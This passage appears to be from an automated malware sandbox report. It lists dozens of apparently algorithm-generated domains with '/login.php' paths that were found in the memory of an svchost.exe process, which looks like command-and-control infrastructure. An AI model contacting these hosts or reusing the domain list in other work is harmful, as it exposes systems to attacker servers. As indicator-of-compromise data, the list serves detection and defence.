    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533898265.0000000002957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526067014.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799982430.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526019425.000000000294D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylev.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purymuq.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purypig.com/login.php
    Source: svchost.exe, 00000002.00000003.1459941398.000000000B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533832899.000000000B454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purypol.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2514446491.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytyp.com/login.php
    Source: svchost.exe, 00000002.00000003.1715978327.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719752875.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1726087708.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryxuq.com/
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824832708.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546749994.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1829965352.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvybeg.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850188368.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvydov.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559573077.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1564225122.00000000029FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygyq.com/login.php
    Source: svchost.exe, 00000002.00000002.2654281668.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106241770.00000000029C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587062256.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygyv.com/H
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567044403.0000000003A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjiq.com/login.php
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461020987.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1481907291.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvylyg.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymug.com/login.php
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567044403.0000000003A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447172965.000000000600D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418952774.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587355096.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663353098.00000000060C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvytuq.com/login.php
    Source: svchost.exe, 00000002.00000002.2666485485.00000000061DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073801182.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvytuv.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvywal.com/login.php
    Source: svchost.exe, 00000002.00000003.1715978327.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719752875.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1726087708.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvywav.com/
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461020987.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467659366.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1727481945.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467589807.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvywav.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybep.com/login.php
    Source: svchost.exe, 00000002.00000003.2035294688.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034558504.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023797256.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2026757064.00000000029C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybil.com/H
    Source: svchost.exe, 00000002.00000003.2035294688.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034558504.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023797256.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2026757064.00000000029C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybil.com/http://vowyqyt.com/H
    Source: svchost.exe, 00000002.00000003.1700442233.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydog.com/
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567044403.0000000003A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydog.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygyl.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygyl.com/login.phpg
    Source: svchost.exe, 00000002.00000003.1459941398.000000000B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755017.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467659366.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467589807.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722234012.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyjoq.com/login.php
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2664198427.000000000615D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2658895836.0000000003AFF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417728429.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzylyp.com/login.php
    Source: svchost.exe, 00000002.00000003.1459941398.000000000B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533832899.000000000B454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzymig.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzypug.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078075418.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2065117922.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzytul.com/login.php
    Source: svchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599945595.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600751317.00000000029AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594414511.00000000029E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzywuq.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650532264.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648460098.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyxip.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885927315.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyxyv.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562173607.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559111148.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1554779210.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561263694.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1553664034.0000000006007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyhuq.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2514446491.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587355096.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663353098.00000000060C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyhuv.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebykoq.com/login.php
    Source: svchost.exe, 00000002.00000003.1459941398.000000000B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755017.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461020987.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1727481945.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722234012.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebylug.com/login.php
    Source: svchost.exe, 00000002.00000003.1660127247.0000000003A2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2514446491.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587355096.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663353098.00000000060C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebylyp.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550034338.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546749994.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546693862.000000000B457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebynyg.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyqig.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461020987.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467659366.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1727481945.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467589807.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1464966899.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyrev.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyrev.com/login.phpr
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2065117922.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2067567385.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650594979.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073801182.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebysaq.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebysul.com/login.php
